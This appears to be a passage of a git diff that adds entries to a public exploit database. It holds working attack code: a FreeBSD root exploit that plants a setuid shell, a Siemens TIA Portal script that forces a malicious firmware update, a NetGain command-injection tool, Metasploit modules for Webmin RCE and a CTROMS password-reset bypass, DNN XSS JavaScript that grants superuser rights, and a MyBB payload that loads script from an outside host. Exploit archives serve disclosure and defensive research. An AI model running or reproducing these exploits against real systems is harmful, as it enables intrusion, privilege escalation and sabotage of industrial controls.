NUM_FORKS*NUM_THREADS; count++) { + if (count % 100 == 0) { + printf("[+] Hammer threads ready: %d\n", count); + } + bzero(&client, sizeof(struct sockaddr_un)); + bzero(buf, 256); + + len = sizeof(struct sockaddr_un); + if ((bytes_rec = recvfrom(server_socket, + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] recvfrom"); + break; + } + } + + if (count != NUM_FORKS * NUM_THREADS) { + printf("[!] Could not create all hammer threads, will try though!\n"); + } +} + +void fire() { + int i, j, fd, fd2, bytes_rec, server_socket; + int sv[2], fds[2], hammer_socket[NUM_FORKS]; + int *fd_ptr; + char socket_path[256], sync_buf[3], buf[256]; + pthread_t write_thread, trigger_thread, monitor_thread; + pthread_t hammer_threads[NUM_THREADS]; + pid_t pids[NUM_FORKS]; + socklen_t len; + struct thread_data thread_data; + struct sockaddr_un server, client; + struct sockaddr_un hammer_socket_addr[NUM_FORKS]; + + // Socket for receiving thread status + unlink(SERVER_PATH); + prepare_domain_socket(&server, SERVER_PATH); + server_socket = bind_domain_socket(&server); + + // Sockets to receive hammer signal + for (i = 0; i < NUM_FORKS; i++) { + snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i); + unlink(socket_path); + prepare_domain_socket(&hammer_socket_addr[i], socket_path); + hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]); + } + + strncpy(sync_buf, "1\n", 3); + len = sizeof(struct sockaddr_un); + + if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) { + perror("[!] socketpair"); + exit(1); + } + + pthread_mutex_init(&write_mtx, NULL); + pthread_mutex_init(&trigger_mtx, NULL); + pthread_cond_init(&write_cond, NULL); + pthread_cond_init(&trigger_cond, NULL); + + pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL); + + prepare(sv, fds); + fd = fds[0]; + fd2 = fds[1]; + + thread_data.fd = fd; + thread_data.fd2 = fd2; + pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data); + pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data); + + for (j = 0; j < NUM_FORKS; j++) { + if ((pids[j] = fork()) < 0) { + perror("[!] fork"); + abort(); + } + else if (pids[j] == 0) { + pthread_mutex_init(&hammer_mtx, NULL); + pthread_cond_init(&hammer_cond, NULL); + + close(fd); + close(fd2); + + /* Prevent that a file stream in the hammer threads + * gets the file descriptor of fd for debugging purposes + */ + if ((fd = open_tmp("/tmp/dummy")) == -1) + perror("[!] dummy"); + if ((fd2 = open_tmp("/tmp/dummy2")) == -1) + perror("[!] dummy2"); + printf("[+] Fork %d fd: %d\n", j, fd); + printf("[+] Fork %d fd2: %d\n", j, fd2); + + for (i = 0; i < NUM_THREADS; i++) { + pthread_create(&hammer_threads[i], NULL, hammer, NULL); + } + + printf("[+] Fork %d created all threads\n", j); + + if ((bytes_rec = recvfrom(hammer_socket[j], + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] accept"); + abort(); + } + + pthread_cond_broadcast(&hammer_cond); + + for (i = 0; i < NUM_THREADS; i++) { + pthread_join(hammer_threads[i], NULL); + } + + pthread_cond_destroy(&hammer_cond); + pthread_mutex_destroy(&hammer_mtx); + + exit(0); + } else { + printf("[+] Created child with PID %d\n", pids[j]); + } + } + + read_thread_status(server_socket); + printf("[+] Send signal to Start Hammering\n"); + for (i = 0; i < NUM_FORKS; i++) { + if (sendto(hammer_socket[i], + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &hammer_socket_addr[i], + sizeof(hammer_socket_addr[0])) == -1) { + perror("[!] sendto"); + exit(1); + } + } + + pthread_join(monitor_thread, NULL); + for (i = 0; i < NUM_FORKS; i++) { + kill(pids[i], SIGKILL); + printf("[+] Killed %d\n", pids[i]); + } + + pthread_join(write_thread, (void **) &fd_ptr); + pthread_join(trigger_thread, NULL); + + pthread_mutex_destroy(&write_mtx); + pthread_mutex_destroy(&trigger_mtx); + pthread_cond_destroy(&write_cond); + pthread_cond_destroy(&trigger_cond); + + printf("[+] Returned fd: %d\n", *fd_ptr); + prevent_panic(sv, *fd_ptr); + + // fd was acquired from write_to_file + // which allocs a pointer for it + free(fd_ptr); +} + +int main(int argc, char **argv) +{ + setbuf(stdout, NULL); + + fire(); + + return 0; +} + +EOF + +cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c + +cat > program.c << EOF +#include +#include +#include +#include + +void _init() +{ + if (!geteuid()) + execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); +} + +EOF + +cc -o program.o -c program.c -fPIC +cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles +cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 + +echo "[+] Firing the Heavy Cyber Weapon" +./heavy_cyber_weapon +su + +if [ -f /tmp/xxxx ]; then + echo "[+] Enjoy!" + echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf" + /tmp/xxxx +else + echo "[!] FAIL" +fi \ No newline at end of file diff --git a/exploits/hardware/remote/47083.py b/exploits/hardware/remote/47083.py new file mode 100755 index 000000000..2102db624 --- /dev/null +++ b/exploits/hardware/remote/47083.py @@ -0,0 +1,51 @@ +## +# Exploit Title: Siemens TIA Portal unauthenticated remote command execution +# Date: 06/11/2019 +# Exploit Author: Joseph Bingham +# CVE : CVE-2019-10915 +# Vendor Homepage: www.siemens.com +# Software Link: https://new.siemens.com/global/en/products/automation/industry-software/automation-software/tia-portal.html +# Version: TIA Portal V15 Update 4 +# Tested on: Windows 10 +# Advisory: https://www.tenable.com/security/research/tra-2019-33 +# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a +# Affected Vendors/Device/Firmware: +# - Siemens STEP7 / TIA Portal +## + +## +# Example usage +# $ python cve_2019_10915_tia_portal_rce.py +# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}' +# Received '40' +# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]' +## + +import websocket, ssl, argparse + +parser = argparse.ArgumentParser() +parser.add_argument("target_host", help="TIA Portal host") +parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int) +parser.add_argument("(optional) update_server", help="Malicious firmware update server IP") +args = parser.parse_args() + +host = args.target_host +port = args.target_port +updatesrv = args.update_server +ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE}) +# Read current proxy settings +#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]' +# Change application proxy settings +#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]' +# Force a malicious firmware update +req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]' +ws.send(req) + +result = ws.recv() +print("Received '%s'" % result) + +result = ws.recv() +print("Received '%s'" % result) + +result = ws.recv() +print("Received '%s'" % result) \ No newline at end of file diff --git a/exploits/ios/local/47409.txt b/exploits/ios/local/47409.txt new file mode 100644 index 000000000..2719c6cf9 --- /dev/null +++ b/exploits/ios/local/47409.txt @@ -0,0 +1,18 @@ +Exploit Title: SockPuppet 3 +Date: September 8, 2019 +Exploit Author: Umang Raghuvanshi +Vendor Homepage: https://apple.com +Software Link: https://ipsw.me/ +Version: iOS 11.0—12.2, iOS 12.4 +Tested on: iOS 11.0—12.2, iOS 12.4 +CVE: CVE-2019-8605 + +This is an alternative (and complete) exploit for CVE-2019-8605. I have only implemented the exploit and do not claim any rights for discovering and/or publishing the vulnerability. The actual exploit code is in “SockPuppet3.cpp”, other files are either helpers or documentation. This exploit [1] has already been verified in production several times [2] [3], however, I can assist in additional verification if required. + +POC: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47409.zip + +[1] https://gist.github.com/ur0/a9b2d8088479a70665f729c4e9bf8720 +[2] https://twitter.com/Pwn20wnd/status/1163392040073191426 +[3] https://twitter.com/electra_team/status/1163658714840047618 \ No newline at end of file diff --git a/exploits/jsp/webapps/47391.go b/exploits/jsp/webapps/47391.go new file mode 100755 index 000000000..00b08b4a7 --- /dev/null +++ b/exploits/jsp/webapps/47391.go @@ -0,0 +1,71 @@ +/******************************************************************************** +# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion +# Date: 15 September 2019 +# Exploit Author: azams / @TheRealAzams +# Vendor Homepage: http://netgain-systems.com +# Software Link: http://www.netgain-systems.com/free/ +# Version: v10.1.68 +# Tested on: Linux +# +# Install golang: https://golang.org/doc/install +# Compile exploit: go build exploit.go +# Run exploit without compiling: go run exploit.go +# Shouts: Rix, Channisa, Ridho7ul & Horangi! +*********************************************************************************/ +package main + +import ( + "crypto/tls" + "fmt" + "io/ioutil" + "net/http" + "net/url" + "os" + "strings" +) + +var ( + target string + port string + cmd string +) + +func main() { + for i := range os.Args { + if os.Args[i] == "-u" { + target = os.Args[i+1] + } else if os.Args[i] == "-p" { + port = os.Args[i+1] + } else if os.Args[i] == "-cmd" { + cmd = os.Args[i+1] + } + } + if target != "" || port != "" || cmd != "" { + cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost" + status, body := exploit() + if strings.Contains(status, "200") { + fmt.Println("Status Code: " + status) + result := strings.Split(body, "0xdeadnoob") + fmt.Println("Result: \n" + strings.Trim(result[1], "\n")) + return + } + fmt.Println("Exploit failed!") + } else { + fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'") + } +} + +func exploit() (string, string) { + tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}} + client := &http.Client{Transport: tbTransport} + datas, err := url.ParseQuery(cmd) + req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode())) + req.Header.Set("Content-type", "application/x-www-form-urlencoded") + resp, err := client.Do(req) + if err != nil { + panic(err) + } + defer resp.Body.Close() + body, _ := ioutil.ReadAll(resp.Body) + return resp.Status, string(body) +} \ No newline at end of file diff --git a/exploits/linux/dos/44994.html b/exploits/linux/dos/44994.html new file mode 100644 index 000000000..900743d93 --- /dev/null +++ b/exploits/linux/dos/44994.html @@ -0,0 +1,30 @@ +# Exploit Title: Tor Browser - Use After Free (PoC) +# Date: 09.07.2018 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: https://www.torproject.org/ +# Software Link: https://www.torproject.org/download/download-easy.html.en +# Version: Tor 0.3.2.x before 0.3.2.10 +# Tested on: Kali Linux +# CVE : CVE-2018-0491 + +#Run exploit, result DOS + + + + +veryhandsome jameel naboo + + \ No newline at end of file diff --git a/exploits/linux/remote/48196.txt b/exploits/linux/remote/48196.txt new file mode 100644 index 000000000..5b8bcfe56 --- /dev/null +++ b/exploits/linux/remote/48196.txt @@ -0,0 +1,131 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' , + 'Description' => %q{ + This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure. + In order to exploit this vulnerability, the username must be known. + Exploiting this vulnerability create a new password for the user you specified and present it to you. + + The "verification code" and "cookie generate" functions required to reset the password contain vulnerability. + When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is transmitted to the account's phone number for password reset. + But this verification code written in the database is also reflected in the response of the request. + The first vector would be to use this verification code. + The second vector is the "rand" cookie values returned in this request. These values are md5. + If these values are assigned in the response, password reset can be done via these cookie values. + Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ] + }, + 'References' => + [ + [ 'CVE', '' ], + [ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ], + [ 'URL', 'https://www.globalservices.bt.com' ] + ], + 'Author' => + [ + 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "March 2 2020", + 'DefaultOptions' => { 'SSL' => true } + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'Username']), + OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)]) + ]) + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def check + begin + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'), + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{Rex::Text.rand_text_alphanumeric(8)}" + }) + rescue + return Exploit::CheckCode::Unknown + end + + if res.code == 200 and res.body.include? '"rand"' + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def run + unless Exploit::CheckCode::Appears == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getuserinfo.jsp'), + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{datastore["USERNAME"]}" + }) + + if res.code == 200 and res.body.include? '"mobileMask"' + print_good("Excellent! password resettable for #{datastore["USERNAME"]}") + else + fail_with(Failure::NotVulnerable, 'The user you specified is not valid') + end + + begin + + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'), + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{datastore["USERNAME"]}" + }) + + @cookie = res.get_cookies + + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getresult.jsp'), + 'cookie' => @cookie, + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{datastore["USERNAME"]}&password=#{datastore["PASSWORD"]}" + }) + if res.body.include? 'result":10' + print_good("boom! Password successfully reseted.") + print_good("Username : #{datastore["USERNAME"]}") + print_good("Password : #{datastore["PASSWORD"]}") + else + fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res.code}") + end + end + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/47330.rb b/exploits/linux/webapps/47330.rb new file mode 100755 index 000000000..a5857537a --- /dev/null +++ b/exploits/linux/webapps/47330.rb @@ -0,0 +1,170 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Webmin < 1.930 Remote Code Execution", + 'Description' => %q{ + This exploit takes advantage of a code execution issue within the function + unserialise_variable() located in web-lib-funcs.pl, in order to gain root. + The only prerequisite is a valid session id. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'James Bercegay', # Vulnerability Discovery + ], + 'References' => + [ + [ 'URL', 'https://www.gulftech.org/' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => '2019/08/30', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('WMPORT', [ true, "Webmin port", '10000']), + OptString.new('WMUSER', [ true, "Webmin username", 'test']), + OptString.new('WMPASS', [ true, "Webmin password", 'test']), + ]) + end + + def check + + # Set Webmin port + datastore['RPORT'] = datastore['WMPORT'] + + # Verbose + print_status("Attempting to login") + + # Send login request + res = send_request_cgi( + { + 'uri' => '/session_login.cgi', + 'method' => 'POST', + 'vars_post' => + { + 'user' => datastore['WMUSER'], + 'pass' => datastore['WMPASS'], + 'save' => '1' + }, + 'cookie' => "redirect=1; testing=1; sessiontest=1;" + }) + + # If succesful cookie will be set + if ( res and res.headers['Set-Cookie'] ) + # Do we have a valid SID? + if ( /sid=/.match(res.headers['Set-Cookie']) ) + # Extract the SID + sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1] + print_good("Login was successful") + else + # No dice + print_bad("Unable to login") + return Exploit::CheckCode::Safe + end + else + # No dice + print_bad("Unexpected response") + return Exploit::CheckCode::Safe + end + + # Verbose + print_status("Checking if host is vulnerable") + + # Try to execute arbitrary code + res = send_request_cgi({ + 'uri' => '/rpc.cgi', + 'method' => 'POST', + 'headers' => + { + 'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + }, + 'data' => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"', + 'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid + }) + + # If it works our custom Content-Type will be set + if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" ) + # Good + return Exploit::CheckCode::Vulnerable + else + # Bad + return Exploit::CheckCode::Safe + end + end + + def exploit + + # Set Webmin port + datastore['RPORT'] = datastore['WMPORT'] + + # Verbose + print_status("Attempting to login") + + # Send login request + res = send_request_cgi( + { + 'uri' => '/session_login.cgi', + 'method' => 'POST', + 'vars_post' => + { + 'user' => datastore['WMUSER'], + 'pass' => datastore['WMPASS'], + 'save' => '1' + }, + 'cookie' => "redirect=1; testing=1; sessiontest=1;" + }) + + # If succesful cookie will be set + if ( res and res.headers['Set-Cookie'] ) + # Do we have a valid SID? + if ( /sid=/.match(res.headers['Set-Cookie']) ) + # Extract the SID + sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1] + print_good("Login was successful") + else + # No dice + print_bad("Unable to login") + return + end + else + # No dice + print_bad("Unexpected response") + return + end + + # Verbose + print_status("Sending selected payload") + + # Hex encode payload to prevent problems with the payload getting mangled + hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x') + + # Send selected payload + res = send_request_cgi({ + 'uri' => '/rpc.cgi', + 'method' => 'POST', + 'headers' => + { + 'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + }, + 'data' => 'OBJECT CGI;`' + hex + '`', + 'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid + }) + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/47342.html b/exploits/multiple/webapps/47342.html new file mode 100644 index 000000000..2795f2f67 --- /dev/null +++ b/exploits/multiple/webapps/47342.html @@ -0,0 +1,233 @@ +Hello, + +Please find the below vulnerability details, + +--------------------------------------------------------------------------------------------------------------------------------- + +# Exploit Title: Wolters Kluwer TeamMate+ – Cross-Site Request Forgery +(CSRF) vulnerability +# Date: 02/09/2019 +# Exploit Author: Bhadresh Patel +# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0) +# CVE : CVE-2019-10253 + +This is an article with PoC exploit code for for Wolters Kluwer TeamMate+ – +Cross-Site Request Forgery (CSRF) vulnerability + +--------------------------------------------------------------------------------------------------------------------------------- + + +Title: +==== + +Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability + + +CVE: +==== + +CVE-2019-10253 + + +Date: +==== + +02/09/2019 (dd/mm/yyyy) + + +Vendor: +====== + +Wolters Kluwer is a global leader in professional information, software +solutions, and services for the health, tax & accounting, finance, risk & +compliance, and legal sectors. We help our customers make critical +decisions every day by providing expert solutions that combine deep domain +knowledge with specialized technology and services. + +Vendor link: http://www.teammatesolutions.com/about-us.aspx + + +Vulnerable Product: +============== + +TeamMate+ + +TeamMate Global Audit Solutions, part of the Tax and Accounting Division of +Wolters Kluwer, helps professionals in all industries at organizations +around the world manage audit and compliance risks and business issues by +providing targeted, configurable, and efficient software solutions. +Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate +Analytics. Together, this ecosystem of solutions provides organizations +with the combined assurance they need to manage all aspects of risk +identification and assessment, electronic working paper creation and +management, controls framework management, and data analysis. + + +Abstract: +======= + +Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an +attacker to upload malicious/forged files on TeamMate server or replace +existing uploaded files with malicious/forged files by enticing +authenticated user to visit attacker page. + + + +Report-Timeline: +================ + +19/03/2019: Vendor notified +19/03/2019: Vendor responded requesting further information +20/03/2019: Further technical information with PoC was shared with vendor +01/07/2019: Vendor fixed the issue in version 3.2 + + +Affected Software Version: +========================== + +<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0) + + +Exploitation-Technique: +======================= + +Remote + + +Severity Rating (CVSS): +======================= + +4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) + +CVE ID: +======= + +CVE-2019-10253 + + +Details: +======= + +A Cross-Site Request Forgery (CSRF) vulnerability is discovered in +TeamMate+ which allows a remote attacker to modify application data (upload +malicious/forged files on TeamMate server or replace existing uploaded +files with malicious/forged files) without victim's knowledge by enticing +authenticated user to visit attacker page/URL. + +The specific flaw exists within the handling of request to +“DomainObjectDocumentUpload.ashx” application. An application failed to +validate CSRF token before handling the POST request. + +Vulnerable module/page/application: +/TeamMate/Upload/DomainObjectDocumentUpload.ashx + +PoC Exploit code: +---------------------------------------------------------------------------- + + + + + + + + + +---------------------------------------------------------------------------- + +Credits: +======= + +Bhadresh Patel \ No newline at end of file diff --git a/exploits/multiple/webapps/47449.txt b/exploits/multiple/webapps/47449.txt new file mode 100644 index 000000000..461e3b3f3 --- /dev/null +++ b/exploits/multiple/webapps/47449.txt @@ -0,0 +1,204 @@ +/* +Exploit Title: "Display Name" Stored Unauthenticated XSS in DNN v9.3.2 +Date: 4th of July, 2019 +Exploit Author: Semen Alexandrovich Lyhin +Vendor Homepage: https://www.dnnsoftware.com/ +Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases +Version: v9.3.2 +CVE : CVE-2019-13293 + +A malicious unauthenticated person can attempt to register a user with the XSS payload in "Display Name" parameter. +The administrator of the website will see a notification that a new user needs to be approved. +An administrator should click on this notification, and the JavaScript code will be executed in the administrator's browser. + +This exploit adds the user, and grants him administrator priviliges. + +A native module "module creator" also allows remote code execution. + +*/ + + + +function ApproveNotification(baseurl, id) { + return new Promise(function (resolve, reject) { + var url = baseurl + "/Activity-Feed/Messages/"; + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var post_params = "NotificationId=" + id; + var x1 = new XMLHttpRequest(); + + x1.open("POST", baseurl + "/API/InternalServices/NewUserNotificationService/Authorize"); + x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8"); + x1.setRequestHeader('RequestVerificationToken', token); + x1.send(post_params); + resolve(); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + +function MakeSuperAdmin(baseurl, id) { + return new Promise(function (resolve, reject) { + var url = baseurl + "/Activity-Feed/Messages/"; + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var post_params = "null" + var x1 = new XMLHttpRequest(); + + x1.open("POST", baseurl + "/API/PersonaBar/Users/UpdateSuperUserStatus?userId=" + id + "&setSuperUser=true"); + x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8"); + x1.setRequestHeader('RequestVerificationToken', token); + x1.send(post_params); + resolve(); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + +function GetNotification(baseurl, username, moduleid, tabid) { + return new Promise(function (resolve, reject) { + var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/" + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var x1 = new XMLHttpRequest(); + + x1.open("GET", baseurl + "/API/CoreMessaging/MessagingService/Notifications?afterNotificationId=-1&numberOfRecords=1000&_=1562677665517", true); + x1.setRequestHeader('ModuleId', moduleid); + x1.setRequestHeader('TabId', tabid); + x1.onreadystatechange = () => { + + if (x1.readyState == 4) { + if (!x1.responseType === "text") { + data = x1.responseText; + } else if (x1.responseType === "document") { + data = x1.responseXML; + } else { + data = x1.response; + } + + //console.log(JSON.parse(data)); + data = JSON.parse(data); + + for (var key in data['Notifications']){ + if (data['Notifications'][key]['Body'].includes(username)) { + resolve((data['Notifications'][key]['NotificationId'])); + }; + } + reject(); + } + } + x1.send(null); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + +function GetUserId(baseurl, username, tabid) { + return new Promise(function (resolve, reject) { + var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/" + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var x1 = new XMLHttpRequest(); + + x1.open("GET", baseurl + "/API/PersonaBar/Users/GetUsers?searchText=" + username + "&filter=0&pageIndex=0&pageSize=10&sortColumn=&sortAscending=false", true); + x1.setRequestHeader('TabId', tabid); + x1.onreadystatechange = () => { + if (x1.readyState == 4) { + if (!x1.responseType === "text") { + data = x1.responseText; + } else if (x1.responseType === "document") { + data = x1.responseXML; + } else { + data = x1.response; + } + + //console.log(data); + data = JSON.parse(data); + resolve((data['Results'][0]['userId'])); + + reject(); + } + } + x1.send(null); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + + +async function main(){ + var username = "nobody34567"; + var baseurl = "http://192.168.18.10/dotnetnuke/"; + var moduleid = "374"; + var tabid = "27"; //It's default ID of the module and tab, that should be used to get notification id. We can also parse it from the webpage. + var NotificationId = await GetNotification(baseurl, username, moduleid, tabid); + await ApproveNotification(baseurl, NotificationId); + var UserID = await GetUserId(baseurl, username, tabid); + MakeSuperAdmin(baseurl, UserID); +} + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/47161.php b/exploits/php/webapps/47161.php new file mode 100644 index 000000000..79b081f32 --- /dev/null +++ b/exploits/php/webapps/47161.php @@ -0,0 +1,109 @@ +/* +# Exploit Title: MyBB < 1.8.21 Authenticated RCE +# Date: July 24, 2019 +# Exploit Author: Giovanni Chhatta (https://www.linkedin.com/in/giovannichhatta/) +# Vendor Homepage: https://mybb.com/ +# Software Link: https://resources.mybb.com/downloads/mybb_1820.zip +# Version: 1.8.20 +# Tested on: Windows 10 +# Blog: https://blog.ripstech.com/2019/mybb-stored-xss-to-rce/ + +Example payload: [video=youtube]http://test/test#[url]onload='script=document.createElement(%22script%22);script.src=%22https://giovan.nl/mybb.js%22;document.body.append(script);'//[/url][/video] +This payload fetches another JS file (mybb.js), hosted on a VPS. + +NOTE: Mybb's textbox will dynamically change apostrophes (') to ' . To fix this just manually change them back to apostrophes and hit 'send'. +The payload will trigger once an admin views the message. +*/ + +/* + * mybb.js + */ + +function postReq(toUrl,body,setHeaders = true){ + var xhr = new XMLHttpRequest(); + xhr.open("POST",toUrl,false); + + if(setHeaders){ + xhr.setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0"); + 